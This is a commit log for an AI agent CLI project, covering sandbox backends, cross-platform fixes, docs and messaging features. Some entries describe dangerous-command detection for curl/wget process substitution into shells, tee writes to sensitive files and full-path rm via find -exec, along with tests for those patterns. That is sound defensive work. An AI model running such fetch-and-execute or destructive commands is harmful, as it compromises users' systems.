- hermes_cli/clipboard.py: clean module with platform-specific extraction
  - macOS: pngpaste (if installed) → osascript fallback (always available)
  - Linux: xclip (apt install xclip)
- cli.py: BracketedPaste key handler checks clipboard on every paste,
  image bar widget shows attached images, chat() converts to multimodal
  content format, Ctrl+C clears attachments

Inspired by @m0at's fork (https://github.com/m0at/hermes-agent) which
implemented image paste support for local vision models. Reimplemented
cleanly as a separate module with tests.
2026-03-05 17:55:41 -08:00
teknium1
fec8a0da72 Merge PR #296: fix(cron): close lock_fd on failed flock to prevent fd leak
Authored by alireza78a. When flock() raises on a concurrent tick, the
file descriptor was leaked because the except clause returned without
closing it. Adds lock_fd=None init and close in the except path.
2026-03-05 17:05:06 -08:00
teknium1
9f4542b3db fix: require Python 3.11+ in pyproject.toml
Was incorrectly set to >=3.10. Hermes uses tomllib and other 3.11+
features. CONTRIBUTING.md and README already say 3.11+.
2026-03-05 17:04:08 -08:00
teknium1
363633e2ba fix: allow self-hosted Firecrawl without API key + add self-hosting docs
On top of PR #460: self-hosted Firecrawl instances don't require an API
key (USE_DB_AUTHENTICATION=false), so don't force users to set a dummy
FIRECRAWL_API_KEY when FIRECRAWL_API_URL is set. Also adds a proper
self-hosting section to the configuration docs explaining what you get,
what you lose, and how to set it up (Docker stack, tradeoffs vs cloud).

Added 2 more tests (URL-only without key, neither-set raises).
2026-03-05 16:44:21 -08:00
teknium1
a41ba57a7a Merge PR #460: feat(tools): add support for self-hosted firecrawl
Authored by caentzminger. Adds optional FIRECRAWL_API_URL env var to point
the Firecrawl client at a self-hosted instance instead of the cloud API.
2026-03-05 16:41:30 -08:00
teknium1
884c8ea70a chore: add openai/gpt-5.4 to OpenRouter preferred models list 2026-03-05 16:13:45 -08:00
teknium1
c886333d32 feat: smart context length probing with persistent caching + banner display
Replaces the unsafe 128K fallback for unknown models with a descending
probe strategy (2M → 1M → 512K → 200K → 128K → 64K → 32K). When a
context-length error occurs, the agent steps down tiers and retries.
The discovered limit is cached per model+provider combo in
~/.hermes/context_length_cache.yaml so subsequent sessions skip probing.

Also parses API error messages to extract the actual context limit
(e.g. 'maximum context length is 32768 tokens') for instant resolution.

The CLI banner now displays the context window size next to the model
name (e.g. 'claude-opus-4 · 200K context · Nous Research').

Changes:
- agent/model_metadata.py: CONTEXT_PROBE_TIERS, persistent cache
  (save/load/get), parse_context_limit_from_error(), get_next_probe_tier()
- agent/context_compressor.py: accepts base_url, passes to metadata
- run_agent.py: step-down logic in context error handler, caches on success
- cli.py + hermes_cli/banner.py: context length in welcome banner
- tests: 22 new tests for probing, parsing, and caching

Addresses #132. PR #319's approach (8K default) rejected — too conservative.
2026-03-05 16:09:57 -08:00
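The step-down and error-parse pieces, sketched (helper names come from the changes list; the exact token counts per tier are assumptions):

```python
import re

CONTEXT_PROBE_TIERS = [2_097_152, 1_048_576, 524_288, 200_000, 131_072, 65_536, 32_768]

def get_next_probe_tier(current: int) -> int | None:
    # After a context-length error at `current`, retry at the next smaller tier.
    for tier in CONTEXT_PROBE_TIERS:
        if tier < current:
            return tier
    return None

def parse_context_limit_from_error(message: str) -> int | None:
    # Instant resolution when the API states the limit outright.
    m = re.search(r"maximum context length is (\d+)", message)
    return int(m.group(1)) if m else None
```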
teknium1
55b173dd03 refactor: move shutil import to module level
Cleanup on top of PR #305 — replace two inline 'import shutil as _shutil'
with a single module-level import.
2026-03-05 15:57:05 -08:00
dmahan93
9079a27814 fix: prompt box and response box span full terminal width on wide screens
- Replace hardcoded '─' * 200 horizontal rules with Window(char='─')
  so prompt_toolkit fills the entire terminal width automatically
- Use shutil.get_terminal_size().columns instead of Rich Console.width
  for response box, separator line, and input height calculation
  (more reliable inside patch_stdout context)
2026-03-05 15:57:05 -08:00
caentzminger
d7d10b14cd feat(tools): add support for self-hosted firecrawl
Adds optional FIRECRAWL_API_URL environment variable to support
self-hosted Firecrawl deployments alongside the cloud service.

- Add FIRECRAWL_API_URL to optional env vars in hermes_cli/config.py
- Update _get_firecrawl_client() in tools/web_tools.py to accept custom API URL
- Add tests for client initialization with/without URL
- Document new env var in installation and config guides
2026-03-05 16:16:18 -06:00
shitcoinsherpa
81986022b7 Add explicit encoding="utf-8" to all config/data file open() calls
On Windows, open() defaults to the system locale encoding (cp1252,
cp1254, etc.) rather than UTF-8. This breaks any file containing
non-ASCII characters, and also causes crashes when writing JSON with
ensure_ascii=False.

This adds encoding="utf-8" to open() calls in:
- gateway/run.py (config.yaml reads/writes throughout)
- gateway/config.py (gateway.json and config.yaml)
- hermes_cli/config.py (config.yaml load/save)
- hermes_cli/main.py (session export with ensure_ascii=False)
- hermes_cli/status.py (jobs.json and sessions.json)
2026-03-05 17:16:04 -05:00
shitcoinsherpa
dcba291d45 Use pywinpty instead of ptyprocess on Windows for PTY support
ptyprocess depends on Unix-only APIs (fork, openpty) and cannot work
on Windows at all. pywinpty provides a compatible PtyProcess interface
using the Windows ConPTY API.

This conditionally imports winpty.PtyProcess on Windows and
ptyprocess.PtyProcess on Unix. The pyproject.toml pty extra now uses
platform markers so the correct package is installed automatically.
2026-03-05 17:16:04 -05:00
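The conditional import is the whole trick; both packages expose a compatible PtyProcess class:

```python
import sys

if sys.platform == "win32":
    from winpty import PtyProcess  # pywinpty, backed by the Windows ConPTY API
else:
    from ptyprocess import PtyProcess  # Unix-only (fork/openpty)
```

In pyproject.toml the pty extra pairs each package with a sys_platform environment marker so pip installs the right one automatically.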
shitcoinsherpa
48e65631f6 Fix auth store file lock for Windows (msvcrt) with reentrancy support
fcntl is not available on Windows. This adds msvcrt.locking as a
fallback for cross-process advisory locking on Windows.

msvcrt.locking is not reentrant within the same thread, unlike fcntl.flock.
This matters because resolve_codex_runtime_credentials holds the lock and
then calls _save_codex_tokens, which tries to acquire it again. Without
reentrancy tracking, this deadlocks on Windows after a 15-second timeout.

Uses threading.local() to track lock depth per thread, allowing nested
acquisitions to pass through without re-acquiring the underlying lock.

Also handles msvcrt-specific requirements: file must be opened in r+ mode
(not a+), must have at least 1 byte of content, and the file pointer must
be at position 0 before locking.
2026-03-05 17:16:03 -05:00
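A sketch of the depth-tracking idea (helper names are illustrative; only the threading.local() counter and the msvcrt quirks come from the message):

```python
import sys
import threading

_state = threading.local()

def acquire_store_lock(f):
    # f must be opened 'r+' with >= 1 byte, and seeked to 0 before msvcrt locks.
    depth = getattr(_state, "depth", 0)
    if depth == 0:
        if sys.platform == "win32":
            import msvcrt
            f.seek(0)
            msvcrt.locking(f.fileno(), msvcrt.LK_LOCK, 1)
        else:
            import fcntl
            fcntl.flock(f.fileno(), fcntl.LOCK_EX)
    _state.depth = depth + 1  # nested acquisition: just bump the counter

def release_store_lock(f):
    _state.depth = depth = getattr(_state, "depth", 1) - 1
    if depth == 0:
        if sys.platform == "win32":
            import msvcrt
            f.seek(0)
            msvcrt.locking(f.fileno(), msvcrt.LK_UNLCK, 1)
        else:
            import fcntl
            fcntl.flock(f.fileno(), fcntl.LOCK_UN)
```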
rovle
a6499b6107 fix(daytona): use shell timeout wrapper instead of broken SDK exec timeout
The Daytona SDK's process.exec(timeout=N) parameter is not enforced —
the server-side timeout never fires and the SDK has no client-side
fallback, causing commands to hang indefinitely.

Fix: wrap commands with timeout N sh -c '...' (coreutils) which
reliably kills the process and returns exit code 124. Added
shlex.quote for proper shell escaping and a secondary deadline (timeout + 10s) that force-stops the sandbox if the shell timeout somehow fails.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 13:12:41 -08:00
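The wrapper in one line (only shlex.quote and the coreutils timeout come from the message; the helper shape is illustrative):

```python
import shlex

def wrap_with_timeout(command: str, timeout: int) -> str:
    # coreutils `timeout` kills the process and returns exit code 124,
    # independent of the SDK's unenforced exec(timeout=N).
    return f"timeout {timeout} sh -c {shlex.quote(command)}"

# wrap_with_timeout("sleep 999", 5) -> "timeout 5 sh -c 'sleep 999'"
```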
0xbyt4
14a11d24b4 fix: handle None args in build_tool_preview
When an LLM returns null/empty tool call arguments, json.loads()
produces None. build_tool_preview then crashes with
"argument of type 'NoneType' is not iterable" on the `in` check.
Return None early when args is falsy.
2026-03-05 23:09:11 +03:00
rovle
74a36b0729 docs: add Daytona to backend lists in docs
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:55:41 -08:00
rovle
efc7a7b957 fix(daytona): don't guess /root on cwd probe failure, keep constructor default; update tests to reflect this
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:49:35 -08:00
rovle
4f1464b3af fix(daytona): default disk to 10GB to match platform limit
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:37:30 -08:00
rovle
3a41079fac fix(daytona): add optional dependency group to pyproject.toml
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:13:12 -08:00
rovle
5279540bb4 fix(daytona): add missing config mappings in gateway, CLI defaults, and config display
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:12:50 -08:00
rovle
577da79a47 fix(daytona): make disk cap visible and use SDK enum for sandbox state

- Replace logger.warning with warnings.warn for the disk cap so users
  actually see it (logger was suppressed by CLI's log level config)
- Use SandboxState enum instead of string literals in
  _ensure_sandbox_ready

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:03:39 -08:00
rovle
1faa9648d3 chore(daytona): cap the disk size to current maximum on daytona sandboxes
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:43:41 -08:00
PercyDikec
ad57bf1e4b fix(cli): use correct dict key for codex auth file path in status output 2026-03-05 21:27:12 +03:00
rovle
d5efb82c7c test(daytona): add unit and integration tests for Daytona backend
Unit tests cover cwd resolution, sandbox persistence/resume, cleanup,
command execution, resource conversion, interrupt handling, retry
exhaustion, and sandbox readiness checks. Integration tests verify
basic commands, filesystem ops, session persistence, and task
isolation against a live Daytona API.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:26:22 -08:00
PercyDikec
36214d14db fix(cli): use correct visibility filter string in codex API model fetch 2026-03-05 21:12:53 +03:00
rovle
ea2f7ef2f6 docs(config): add Daytona disk limit hint and fix default cwd in example
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
435530018b fix(daytona): resolve cwd by detecting home directory inside the sandbox 2026-03-05 10:02:22 -08:00
rovle
df61054a84 feat(cli): add Daytona to setup wizard, doctor, and status display
Add Daytona as a backend choice in the interactive setup wizard with
SDK installation and API key prompts. Show Daytona image in status
output and validate API key + SDK in doctor checks. Add OPTION 6
example in cli-config.yaml.example.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
690b8bb563 feat(cli): add Daytona config mapping and env var sync
Wire TERMINAL_DAYTONA_IMAGE through cli.py env_mappings and
hermes_cli/config.py so `hermes config set` propagates correctly.
2026-03-05 10:02:21 -08:00
rovle
c43451a50b feat(terminal): integrate Daytona backend into tool pipeline
Add Daytona to image selection, container_config guards, environment
factory, requirements check, and diagnostics in terminal_tool.py and
file_tools.py. Also add to sandboxed-backend approval bypass.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
rovle
1e312c6582 feat(environments): add Daytona cloud sandbox backend
New execution backend using the Daytona Python SDK. Supports persistent
sandboxes via stop/start lifecycle, interrupt handling, and automatic
retry on transient errors.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
PercyDikec
e36c8cd49a fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser 2026-03-05 20:32:38 +03:00
PercyDikec
16cb6d1a6e fix(gateway): return response from /retry handler instead of discarding it 2026-03-05 19:59:54 +03:00
Teknium
21d61bdd71 Merge pull request #307 from batuhankocyigit/patch-1
fix: correct typo 'Grup' -> 'Group' in test section headers
2026-03-05 08:54:05 -08:00
teknium1
ad9c26afb8 Merge PR #293: fix: eliminate shell noise from terminal output and fix test failures
Authored by 0xbyt4. Wraps commands with unique fence markers to isolate real output
from shell init/exit noise (oh-my-zsh, macOS session restore, etc.). Falls back to
expanded pattern-based cleaning. Also fixes BSD find fallback and test module shadowing.
2026-03-05 08:48:26 -08:00
JackTheGit
71c0cd00e5 docs: fix spelling of 'publicly' 2026-03-05 16:46:21 +00:00
teknium1
83f99d8203 Merge PR #438: fix: add missing empty-content guard after think-block stripping in retry path
Authored by PercyDikec. Fixes #437.
The retry path in _handle_max_iterations was missing the second if final_response:
guard after stripping <think> blocks, which could result in an empty assistant message
being appended to history instead of using the fallback message.
2026-03-05 08:37:49 -08:00
teknium1
6b37d38dee Merge PR #292: feat(whatsapp): native media attachments for images, videos and documents
Authored by satelerd. Adds native WhatsApp media sending for images, videos,
and documents via MEDIA: tags. Also includes conflict resolution with edit_message
feature, Telegram hint fix (only advertise supported media types), and import cleanup.
2026-03-05 08:35:13 -08:00
PercyDikec
938499ddfb fix: add missing empty-content guard after think-block stripping in retry path 2026-03-05 18:57:59 +03:00
teknium1
d92266d7c0 ci: pin tests to Python 3.11 only
The installer hardcodes PYTHON_VERSION=3.11 and creates the venv
with that version. No point testing 3.12 — halves CI time.
2026-03-05 07:55:01 -08:00
teknium1
a352b5c193 docs: remove legacy docs/ directory — all content migrated to website
Removed 10 markdown files (~4,200 lines) that have been fully migrated,
restructured, and accuracy-audited on the docs site at
hermes-agent.nousresearch.com/docs/

Left docs/README.md as a pointer to the website.
Updated CONTRIBUTING.md file tree reference.
2026-03-05 07:37:06 -08:00
teknium1
82f7483999 docs: simplify README from 1776 to 121 lines
All detailed documentation now lives at hermes-agent.nousresearch.com/docs/.
README retains: banner, badges, value proposition, feature highlights,
one-line install, getting started commands, docs site link table,
quick contributor setup, community links, and license.

Removed: 1600+ lines of inline docs covering config, messaging setup,
tools, skills, MCP, terminal backends, memory, cron, hooks, security,
TTS, browser, batch processing, RL training, manual installation,
env vars reference, file structure, and troubleshooting.
2026-03-05 07:33:07 -08:00
teknium1
56dc9277d7 ci: add test workflow for PRs and main branch
Run pytest on Python 3.11 + 3.12 for every PR and push to main.

- Uses uv for fast dependency installation
- Excludes integration tests (need real API keys/services)
- Blanks API keys as safety net against accidental real API calls
- Concurrency: cancels in-progress runs when new commits are pushed
- 10 minute timeout (tests take ~77s)
- fail-fast disabled so both Python versions run independently

GitHub's default 'require approval for first-time contributors'
means maintainers approve CI before it runs on new contributors'
PRs, preventing abuse of CI resources.
2026-03-05 07:29:16 -08:00
teknium1
d50e9bcef7 docs: add 11 new pages + expand 4 existing pages (26 → 37 total)
New pages (sourced from actual codebase):
- Security: command approval, DM pairing, container isolation, production checklist
- Session Management: resume, export, prune, search, per-platform tracking
- Context Files: AGENTS.md project context, discovery, size limits, security
- Personality: SOUL.md, 14 built-in personalities, custom definitions
- Browser Automation: Browserbase setup, 10 browser tools, stealth mode
- Image Generation: FLUX 2 Pro via FAL, aspect ratios, auto-upscaling
- Provider Routing: OpenRouter sort/only/ignore/order config
- Honcho: AI-native memory integration, setup, peer config
- Home Assistant: HASS setup, 4 HA tools, WebSocket gateway
- Batch Processing: trajectory generation, dataset format, checkpointing
- RL Training: Atropos/Tinker integration, environments, workflow

Expanded pages:
- code-execution: 51 → 195 lines (examples, limits, security, comparison table)
- delegation: 60 → 216 lines (context tips, batch mode, model override)
- cron: 88 → 273 lines (real-world examples, delivery options, expression cheat sheet)
- memory: 98 → 249 lines (best practices, capacity management, examples)
2026-03-05 07:28:41 -08:00
teknium1
c4e520fd6e docs: add documentation & housekeeping checklist to PR template
Add a second checklist section covering common oversights seen in PRs:
- Update relevant docs (README, docs/, docstrings)
- Update cli-config.yaml.example when adding config keys
- Update CONTRIBUTING.md/AGENTS.md for architecture changes
- Consider cross-platform impact (Windows/macOS)
- Update tool schemas when changing tool behavior

Each item has an 'or N/A' option so contributors aren't blocked
on items that don't apply to their change.
2026-03-05 07:23:52 -08:00
teknium1
30ff395924 feat: add issue and PR templates
Add structured GitHub templates based on analysis of 200+ closed PRs
and 50+ closed issues to improve submission quality:

Issue templates (YAML form-based):
- Bug Report: requires reproduction steps, expected/actual behavior,
  OS/Python/Hermes version. Optional root cause analysis field.
- Feature Request: requires problem/use case, links to skill-vs-tool
  guidance in CONTRIBUTING.md to reduce misguided tool PRs.
- Setup/Installation Help: requires install method, hermes doctor
  output, error logs, steps already tried.
- Template chooser config with links to Discord, docs, contributing guide.

PR template:
- Type of change selector (bug/feature/security/docs/tests/refactor/skill)
- Mandatory issue reference, changes list, testing steps
- Checklist: conventional commits, no duplicates, focused changes,
  tests pass, tests added, platform tested
- Dedicated 'New Skills' section asking if skill is broadly useful
  and properly formatted/tested

Key problems these templates address:
- Bug reports with no reproduction steps or environment info
- Duplicate/racing PRs (multiple people fixing same issue)
- Stale branches with 85+ unrelated file changes
- Junk skill PRs that should go to Skills Hub instead of bundled
- Missing tests on bug fix PRs
- No issue references on PRs
2026-03-05 07:22:39 -08:00
teknium1
f55025952d docs: reorder sidebar — Quickstart before Installation 2026-03-05 07:15:35 -08:00
teknium1
1bc45ee8fe docs: simplify installer description for getting started page 2026-03-05 07:14:13 -08:00
teknium1
19016497ef docs: fix all remaining minor accuracy issues
- updating.md: Note that 'hermes update' auto-handles config migration
- cli.md: Add summary_model to compression config, fix display config
  (add personality/compact), remove unverified pastes/ claim
- configuration.md: Add 5 missing config sections (stt, human_delay,
  code_execution, delegation, clarify), fix display defaults,
  fix reasoning_effort default to empty/unset
- messaging/index.md: Add GATEWAY_ALLOWED_USERS to security section
- skills.md: Add category field to skills_list return value
- mcp.md: Document auto-registered utility tools (resources/prompts)
- architecture.md: Fix file_tools.py reference, base_url default to None,
  synchronous agent loop pseudocode
- cli-commands.md: Fix hermes logout description
- environment-variables.md: Add HERMES_QUIET, HERMES_EXEC_ASK,
  BROWSER_INACTIVITY_TIMEOUT, GATEWAY_ALLOWED_USERS

Verification scan: 27/27 checks passed, zero issues remaining.
2026-03-05 07:00:51 -08:00
teknium1
d578d06f59 docs: comprehensive accuracy audit fixes (35+ corrections)
CRITICAL fixes:
- Installation: Remove false prerequisites (installer auto-installs everything except git)
- Tools: Remove non-existent 'web_crawl' tool from tools table
- Memory: Remove non-existent 'read' action (only add/replace/remove exist)
- Code execution: Fix 'search' to 'search_files' in sandbox tools list
- CLI commands: Fix --model/--provider/--toolsets/--verbose as chat subcommand flags

IMPORTANT fixes:
- Installation: Add missing installer features (Node.js, ripgrep, ffmpeg, skills seeding)
- Installation: Add 6 missing package extras to table (mcp, honcho, tts-premium, etc)
- Installation: Fix mkdir to include all directories the installer creates
- Quickstart: Add OpenAI Codex to provider table
- CLI: Fix all 'hermes --flag' to 'hermes chat --flag' across all docs
- Configuration: Remove non-existent --max-turns CLI flag
- Tools: Fix 'search' to 'search_files', add missing 'process' tool
- Skills: Remove skills_categories() (not a registered tool)
- Cron: Remove unsupported 'daily at 9am' schedule format
- TTS: Fix output directory to ~/.hermes/audio_cache/
- Delegation: Clarify depth limit wording
- Architecture: Fix default model, chat() signature, file names
- Contributing: Fix Python requirement from 3.11+ to 3.10+
- CLI reference: Add missing commands (login, tools, sessions subcommands)
- Env vars: Fix TERMINAL_DOCKER_IMAGE default, add HERMES_MODEL
2026-03-05 06:50:22 -08:00
Farukest
e25ad79d5d fix: use _max_tokens_param in max-iterations retry path
The retry summary in _handle_max_iterations hardcodes max_tokens instead
of calling _max_tokens_param(). For direct OpenAI API users (gpt-4o,
o-series), the correct parameter name is max_completion_tokens. The first
attempt at line 2697 already uses _max_tokens_param correctly but the
retry path at line 2743 was missed.
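A minimal sketch of the idea, assuming a helper keyed off the model
name (the real predicate lives in the agent code):

    def _max_tokens_param(model: str) -> str:
        # Direct OpenAI o-series and newer chat endpoints reject
        # max_tokens and require max_completion_tokens instead.
        if model.startswith(("o1", "o3", "gpt-4o")):
            return "max_completion_tokens"
        return "max_tokens"

    # Both the first attempt and the retry must build kwargs this way:
    kwargs = {_max_tokens_param("gpt-4o"): 1024}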
2026-03-05 17:49:37 +03:00
teknium1
f2624a1426 docs: remove Windows support references, recommend WSL2
- Installation: Remove PowerShell/CMD install commands, add WSL2 warning
- Quickstart: Replace PowerShell block with WSL2 tip
- Contributing: Update cross-platform section to clarify Windows unsupported
- Index: Update install description to say WSL2 instead of Windows
2026-03-05 06:36:18 -08:00
jackx707
15561ec425 feat: add WebResearchEnv RL environment for multi-step web research 2026-03-05 14:34:36 +00:00
teknium1
93d93fdea4 feat: add gateway setup wizard and update steps to landing page
- Step 4: Added 'hermes gateway setup' wizard command before gateway start
- Step 5: New 'hermes update' step for keeping the agent up to date
2026-03-05 06:33:40 -08:00
teknium1
87f4e4cb9b chore: remove Windows install options from landing page
- Remove PowerShell and CMD tabs from hero and install sections
- Add WSL to the Linux/macOS tab label
- Update Windows notice: experimental/unsupported, recommend WSL2
- Add Docs nav link pointing to /docs/
- Clean up platform detection JS (always default to linux)
2026-03-05 06:30:09 -08:00
Farukest
82cb1752d9 fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
fuser command does not exist on Windows, causing orphaned bridge processes
to never be cleaned up. On crash recovery, the port stays occupied and the
next connect() fails with address-already-in-use.

Add _kill_port_process() helper that uses netstat+taskkill on Windows and
fuser on Linux/macOS. Replace both call sites in connect() and disconnect().
2026-03-05 17:13:14 +03:00
teknium1
ada3713e77 feat: add documentation website (Docusaurus)
- 25 documentation pages covering Getting Started, User Guide, Developer Guide, and Reference
- Docusaurus with custom amber/gold theme matching the landing page branding
- GitHub Actions workflow to deploy landing page + docs to GitHub Pages
- Landing page at root, docs at /docs/ on hermes-agent.nousresearch.com
- Content extracted and restructured from existing repo docs (README, AGENTS.md, CONTRIBUTING.md, docs/)
- Auto-deploy on push to main when website/ or landingpage/ changes
2026-03-05 05:24:55 -08:00
aydnOktay
7d79ce92ac Improve type hints and error diagnostics in vision_tools 2026-03-05 16:11:59 +03:00
teknium1
1708dcd2b2 feat: implement edit_message() for Telegram/Discord/Slack and fix fallback regression
Building on PR #288's edit_message() abstraction:

- Telegram: edit_message_text() with MarkdownV2 + plain text fallback
- Discord: channel.fetch_message() + msg.edit() with length capping
- Slack: chat_update() via slack_bolt client

Also fixes the fallback regression in send_progress_messages() where
platforms that don't support editing would receive duplicated accumulated
tool lines. Now uses a can_edit flag — after the first failed edit, falls
back to sending individual lines (matching pre-PR behavior).
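A rough sketch of the fallback shape (adapter method names and the
truthy-on-success edit return are assumptions):

    def send_progress_messages(adapter, tool_lines):
        # Accumulate tool lines into one editable message; after the
        # first failed edit, revert to one message per line.
        progress_id, can_edit, acc = None, True, []
        for line in tool_lines:
            acc.append(line)
            if progress_id is None:
                progress_id = adapter.send_message("\n".join(acc))
            elif not (can_edit and adapter.edit_message(progress_id, "\n".join(acc))):
                can_edit = False
                adapter.send_message(line)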
2026-03-05 03:47:51 -08:00
teknium1
5702eba93b Merge PR #288: feat(whatsapp): stream tool progress as a single live-updating message
Authored by satelerd. Adds edit_message() to BasePlatformAdapter and
implements it for WhatsApp via Baileys native editing. Progress messages
accumulate into a single live-updating message instead of N separate ones.

Cherry-picked from stale branch.
2026-03-05 03:44:13 -08:00
Daniel Sateler
a1767fd69c feat(whatsapp): consolidate tool progress into single editable message
Instead of sending a separate WhatsApp message for each tool call during
agent execution (N+1 messages), the first tool sends a new message and
subsequent tools edit it to append their line. Result: 1 growing progress
message + 1 final response = 2 messages instead of N+1.

Changes:
- bridge.js: Add POST /edit endpoint using Baileys message editing
- base.py: Add optional edit_message() to BasePlatformAdapter (no-op
  default, so platforms without editing support work unchanged)
- whatsapp.py: Implement edit_message() calling bridge /edit
- run.py: Rewrite send_progress_messages() to accumulate tool lines and
  edit the progress message. Falls back to sending a new message if
  edit fails (graceful degradation).

Before (5 tools = 6 messages):
  ⚕ Hermes Agent ─── 🔍 web_search... "query"
  ⚕ Hermes Agent ─── 📄 web_extract... "url"
  ⚕ Hermes Agent ─── 💻 terminal... "pip install"
  ⚕ Hermes Agent ─── ✍️ write_file... "app.py"
  ⚕ Hermes Agent ─── 💻 terminal... "python app.py"
  ⚕ Hermes Agent ─── Done! The server is running...

After (5 tools = 2 messages):
  ⚕ Hermes Agent ───
  🔍 web_search... "query"
  📄 web_extract... "url"
  💻 terminal... "pip install"
  ✍️ write_file... "app.py"
  💻 terminal... "python app.py"

  ⚕ Hermes Agent ─── Done! The server is running...

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-05 03:44:08 -08:00
teknium1
b4b426c69d test: add coverage for tee, process substitution, and full-path rm patterns
Tests for the three new dangerous command patterns added in PR #280:
- TestProcessSubstitutionPattern: 7 tests (bash/sh/zsh/ksh + safe commands)
- TestTeePattern: 7 tests (sensitive paths + safe destinations)
- TestFindExecFullPathRm: 4 tests (/bin/rm, /usr/bin/rm, bare rm, safe find)
2026-03-05 01:58:33 -08:00
teknium1
2465674fda Merge PR #280: fix: add missing dangerous command patterns (tee, process substitution, full-path rm)
Authored by dogiladeveloper. Adds detection for tee writes to sensitive files, process substitution with curl/wget, and find -exec with full-path rm.
2026-03-05 01:56:44 -08:00
teknium1
2eca0d4af1 Merge PR #275: fix(batch_runner): preserve traceback when batch worker fails
Authored by batuhankocyigit. Adds explicit traceback logging for batch worker failures and improves tool dispatch error logging in registry.
2026-03-05 01:44:05 -08:00
teknium1
11a7c6b112 fix: update mock agent signature to accept task_id after PR #419
The _Codex401ThenSuccessAgent mock overrides run_conversation() but was
missing the task_id parameter, causing a TypeError in the gateway test.
2026-03-05 01:41:50 -08:00
teknium1
50ea8adf46 Merge PR #419: fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Authored by rovle. Passes session_id as task_id to run_conversation()
in both CLI and gateway, so container backends (Docker/Modal/Singularity)
reuse the same sandbox across turns. Also passes task_id through to
_create_environment() in file_tools.py.

Cherry-picked from original PR branch (which had unrelated divergent
commits from the contributor's fork).
2026-03-05 01:40:13 -08:00
rovle
ca33372595 fix: pass task_id to _create_environment as well, to prevent cross-session state mixing
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
rovle
7d47e3b776 fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
teknium1
fe15a2c65c Merge PR #274: fix(setup): handle TerminalMenu init failures with safe fallback
Authored by jdblackstar. Catches runtime exceptions from TerminalMenu
init (e.g. CalledProcessError from tput with unknown TERM like
xterm-ghostty over SSH) and falls through to the text-based menu.
2026-03-05 01:26:58 -08:00
teknium1
d400fb8b23 feat: add /update slash command for gateway platforms
Adds a /update command to Telegram, Discord, and other gateway platforms
that runs `hermes update` to pull the latest code, update dependencies,
sync skills, and restart the gateway.

Implementation:
- Spawns `hermes update` in a separate systemd scope (systemd-run --user
  --scope) so the process survives the gateway restart that hermes update
  triggers at the end. Falls back to nohup if systemd-run is unavailable.
- Writes a marker file (.update_pending.json) with the originating
  platform and chat_id before spawning the update.
- On gateway startup, _send_update_notification() checks for the marker,
  reads the captured update output, sends the results back to the user,
  and cleans up.

Also:
- Registers /update as a Discord slash command
- Updates README.md, docs/messaging.md, docs/slash-commands.md
- Adds 18 tests covering handler, notification, and edge cases
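The spawn-and-marker shape, roughly (paths and payload fields are
assumptions based on the description above):

    import json, shutil, subprocess
    from pathlib import Path

    def spawn_update(platform: str, chat_id: str) -> None:
        marker = Path.home() / ".hermes" / ".update_pending.json"
        marker.write_text(json.dumps({"platform": platform, "chat_id": chat_id}))
        if shutil.which("systemd-run"):
            # A separate scope survives the gateway restart that
            # `hermes update` itself triggers at the end.
            subprocess.Popen(["systemd-run", "--user", "--scope", "hermes", "update"])
        else:
            subprocess.Popen(["nohup", "hermes", "update"],
                            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)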
2026-03-05 01:20:58 -08:00
Dev User
3221818b6e fix: respect OPENAI_BASE_URL when resolving API key priority
When base_url points to a non-OpenRouter endpoint (e.g. Z.ai),
OPENROUTER_API_KEY incorrectly takes priority over OPENAI_API_KEY,
sending the wrong credentials. This causes 401 errors on the main
inference path and forces users to comment out OPENROUTER_API_KEY,
which then breaks auxiliary clients (compression, vision).

Fix: check whether base_url contains "openrouter" and swap the key
priority accordingly. Also adds GLM-4.7 and GLM-5 context lengths
to DEFAULT_CONTEXT_LENGTHS.
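A minimal sketch of the swapped priority (env var names are from this
message; the surrounding resolution logic is assumed):

    import os

    def pick_api_key(base_url: str | None) -> str | None:
        is_openrouter = bool(base_url) and "openrouter" in base_url
        order = (("OPENROUTER_API_KEY", "OPENAI_API_KEY") if is_openrouter
                 else ("OPENAI_API_KEY", "OPENROUTER_API_KEY"))
        for name in order:
            if os.environ.get(name):
                return os.environ[name]
        return None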
2026-03-05 08:25:16 +00:00
teknium1
2af2f148ab refactor: rewrite duckduckgo-search skill for accuracy and usability
Follow-up to PR #267 merge:
- Fix CLI syntax: -k is keywords, -m is max results (was reversed)
- Add clear trigger condition: use only when web_search tool unavailable
- Remove misleading curl fallback (DuckDuckGo Instant Answer API is not
  a web search endpoint)
- Fix package name: ddgs (renamed from duckduckgo-search)
- Add workflow section for search → web_extract pipeline
- Add pitfalls and limitations sections
- Fix author attribution to actual contributor
- Rewrite shell script as simple ddgs wrapper with availability check
2026-03-04 22:11:09 -08:00
teknium1
d19109742e Merge PR #267: feat(skills): add DuckDuckGo search skill as Firecrawl fallback
Authored by gamedevCloudy. Adds a free web search skill for users without
FIRECRAWL_API_KEY, using the ddgs library or curl.
2026-03-04 22:09:07 -08:00
teknium1
078e2e4b19 fix(cli): Ctrl+C clears input buffer before exiting
Previously, pressing Ctrl+C while text was typed in the input prompt
would immediately exit Hermes. Now follows standard shell behavior:

- Text in buffer → Ctrl+C clears the line (like bash)
- Empty buffer → Ctrl+C exits

